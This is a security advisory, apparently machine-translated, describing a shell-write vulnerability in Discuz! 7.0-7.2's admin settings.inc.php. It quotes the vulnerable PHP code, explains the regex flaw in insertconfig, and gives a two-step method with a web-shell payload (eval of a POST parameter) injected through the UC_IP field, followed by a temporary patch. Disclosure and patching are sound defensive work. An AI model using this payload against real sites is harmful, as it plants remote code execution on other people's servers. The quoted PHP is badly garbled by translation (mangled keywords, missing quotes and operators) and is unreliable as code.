Discuz! 7.0-7.2 background settings. inc. php shell Write Vulnerability

Vulnerability details:
If ($ operation = uc & is_writeable (./config. inc. php) & $ isfounder ){
$ Ucdbpassnew = $ settingsnew [uc] [dbpass] = ********? UC_DBPW: $ settingsnew [uc] [dbpass];
If ($ settingsnew [uc] [connect]) {
$ Uc_dblink = @ mysql_connect ($ settingsnew [uc] [dbhost], $ settingsnew [uc] [dbuser], $ ucdbpassnew, 1 );
If (! $ Uc_dblink ){
Cpmsg (uc_database_connect_error, error );
} Else {
Mysql_close ($ uc_dblink );
}
}

$ Fp = fopen (./config. inc. php, r );
$ Configfile = fread ($ fp, filesize (./config. inc. php ));
$ Configfile = trim ($ configfile );
$ Configfile = substr ($ configfile,-2) ==?> ? Substr ($ configfile, 0,-2): $ configfile;
Fclose ($ fp );

$ Connect =;
If ($ settingsnew [uc] [connect]) {
Require./config. inc. php;
$ Connect = mysql;
$ Samelink = ($ dbhost = $ settingsnew [uc] [dbhost] & $ dbuser = $ settingsnew [uc] [dbuser] & $ dbpw = $ ucdbpassnew );
$ Samecharset =! ($ Dbcharset = gbk & UC_DBCHARSET = latin1 | $ dbcharset = latin1 & UC_DBCHARSET = gbk );
$ Configfile = insertconfig ($ configfile, "/define (UC_DBHOST, s *.*?); /I "," define (UC_DBHOST ,". $ settingsnew [uc] [dbhost]. ");"); // regular expression indicates replacement from), and can be submitted at will, from oldjun.com
$ Configfile = insertconfig ($ configfile, "/define (UC_DBUSER, s *.*?); /I "," define (UC_DBUSER, ". $ settingsnew [uc] [dbuser]."); ");
$ Configfile = insertconfig ($ configfile, "/define (UC_DBPW, s *.*?); /I "," define (UC_DBPW, ". $ ucdbpassnew .");");
$ Configfile = insertconfig ($ configfile, "/define (UC_DBNAME, s *.*?); /I "," define (UC_DBNAME, ". $ settingsnew [uc] [dbname]."); ");
$ Configfile = insertconfig ($ configfile, "/define (UC_DBTABLEPRE, s *.*?); /I "," define (UC_DBTABLEPRE, '". $ settingsnew [uc] [dbname].'... $ settingsnew [uc] [dbtablepre]."); ");
// $ Configfile = insertconfig ($ configfile, "/define (UC_LINK, s *?. *??); /I "," define (UC_LINK, ". ($ samelink & $ samecharset? TRUE: FALSE ).");");
}
$ Configfile = insertconfig ($ configfile, "/define (UC_CONNECT, s *.*?); /I "," define (UC_CONNECT, $ connect );");
$ Configfile = insertconfig ($ configfile, "/define (UC_KEY, s *.*?); /I "," define (UC_KEY, ". $ settingsnew [uc] [key]."); ");
$ Configfile = insertconfig ($ configfile, "/define (UC_API, s *.*?); /I "," define (UC_API, ". $ settingsnew [uc] [api]."); ");
$ Configfile = insertconfig ($ configfile, "/define (UC_IP, s *.*?); /I "," define (UC_IP, ". $ settingsnew [uc] [ip]."); ");
$ Configfile = insertconfig ($ configfile, "/define (UC_APPID, s *?. *??); /I "," define (UC_APPID, ". $ settingsnew [uc] [appid]."); ");

$ Fp = fopen (./config. inc. php, w );
If (! ($ Fp = @ fopen (./config. inc. php, w ))){
Cpmsg (uc_config_write_error, error );
}
@ Fwrite ($ fp, trim ($ configfile ));
@ Fclose ($ fp );
}

Settings. inc. php does not effectively filter the submitted data, causing data to be written.) the data in the configuration file is contaminated, and the regular matching of insertconfig function cannot be correctly matched to the end, as a result, you can successfully bypass daddslashes and write the shell into the configuration file after two inputs.

Function insertconfig ($ s, $ find, $ replace ){
If (preg_match ($ find, $ s )){
$ S = preg_replace ($ find, $ replace, $ s); // replace data with regular expression matching
} Else {
$ S. = "". $ replace;
}
Return $ s;
}
 
 
Test method: The program (method) may be aggressive and only used for security research and teaching. The risk is at your own risk! Step 1: Write Contaminated Data to UC_IP (UC_IP is optional, which generally does not affect the program running): xxx); eval ($ _ POST [cmd])?> Submit;
Step 2: Enter aaa at will for UC_IP, and only match the regular expression). The pre-Semicolon is automatically closed.
 
 
Temporary patch:

Add the following under if ($ operation = uc & is_writeable (./config. inc. php) & $ isfounder:

Foreach ($ settingsnew [uc] as $ key => $ value ){
$ Settingsnew [uc] [$ key] = str_replace (), $ value );
}